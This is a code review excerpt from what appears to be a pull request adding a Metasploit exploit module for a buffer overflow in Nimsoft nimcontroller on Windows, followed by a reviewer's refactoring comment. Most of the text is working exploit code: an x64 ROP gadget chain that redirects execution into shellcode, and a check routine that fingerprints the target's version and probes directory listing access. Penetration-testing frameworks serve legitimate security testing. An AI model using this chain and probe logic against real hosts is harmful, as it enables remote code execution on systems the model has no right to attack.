modules/exploits/windows/nimsoft/nimcontroller_bof.rb

```diff
@@ -0,0 +1,460 @@
+    rop_gadgets += [0x0000000140018c42] * 17  # ret
+    rop_gadgets += [0x00000001400a0b55]       # call rax ; mov rdp qword ptr [rsp+48h] ; mov rsi, qword ptr [rsp+50h] ; mov rax, rbx ; mov rbx, qword ptr [rsp + 40h] ; add rsp,30h ; pop rdi ; ret
+    rop_gadgets += [0x0000000140018c42] * 20  # ret
+
+    rop_gadgets += [0x0000000140002ef6,       # pop rax ; ret (CALL COMPLETE, "JUMP" INTO OUR SHELLCODE)
+                    0x0000000000000000,       # (zero out rax)
+                    0x00000001400eade1,       # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000]       #
+    rop_gadgets += [0x0000000140018c42] * 10  # ret
+    rop_gadgets += [0x0000000140131643,       # pop rcx ; ret
+                    0x0000000000000317,       # (offset to our shellcode)
+                    0x000000014006d8d8]       # add rax, rcx ; add rsp, 0x38 ; ret
+    rop_gadgets += [0x0000000140018c42] * 15  # ret
+    rop_gadgets += [0x00000001400a9747]       # jmp rax
+    rop_gadgets += [0x0000000140018c42] * 20  # ret (do not remove)
+
+    return rop_gadgets.pack("<Q*")
+
+  end
+
+  # check: there are only two prerequisites to getting code execution. The version number
+  # and access to the directory_list probe. The easiest way to get this information is to
+  # ask nicely ;)
+  def check
+
+    connect
+
+    sock.put(generate_probe("get_info", ["interfaces=0"]))
+    response = sock.get_once(4096)
+
+    $i = 0
+    check = 0
+    target_version = ""
+    info = response.split("\x00")
+
+    while $i < info.length
+      if "version".in? info[$i]
+        target_version = info[$i+3]
+        break
+      end
+      $i +=1
+    end
+
+    if target['Version'].in? response
+      print_status("Version #{target['Version']} detected, sending directory_list probe")
+      sock.put(generate_probe("directory_list", ["directory=C:\\", "detail=1"]))
+      check = parse_listing(sock.get_once(4096), "C:\\")
+      disconnect
+
+      if check == 0
+        return Exploit::CheckCode::Vulnerable
+      end
+    end
+
+    return Exploit::CheckCode::Safe
+
+  end
+
+  # parse_listing: once the directory_list probe is sent we're returned a directory listing
+  # unfortunately it's hard to read this simply "decodes" it
+  def parse_listing(response, directory)
+
+    result = {"name" => "", "date" => "", "size" => "", "type" => ""}
+    dank = 1
+    i = 0
+
+    begin
+      dirlist = response.split('\x00')[0].split("\x00")
+      index = dirlist.index("entry") + 3
+      final = dirlist[index..]
+    rescue
+      dank = 0
+    end
+
+    if dank == 0
+      print_error("Failed to gather directory listing")
+      return -1
+    end
```

Comment:
`dank` can only ever be `0` if the `rescue` is called above. may as well move this block to the `rescue` clause and ditch the `dank` temporary state variable.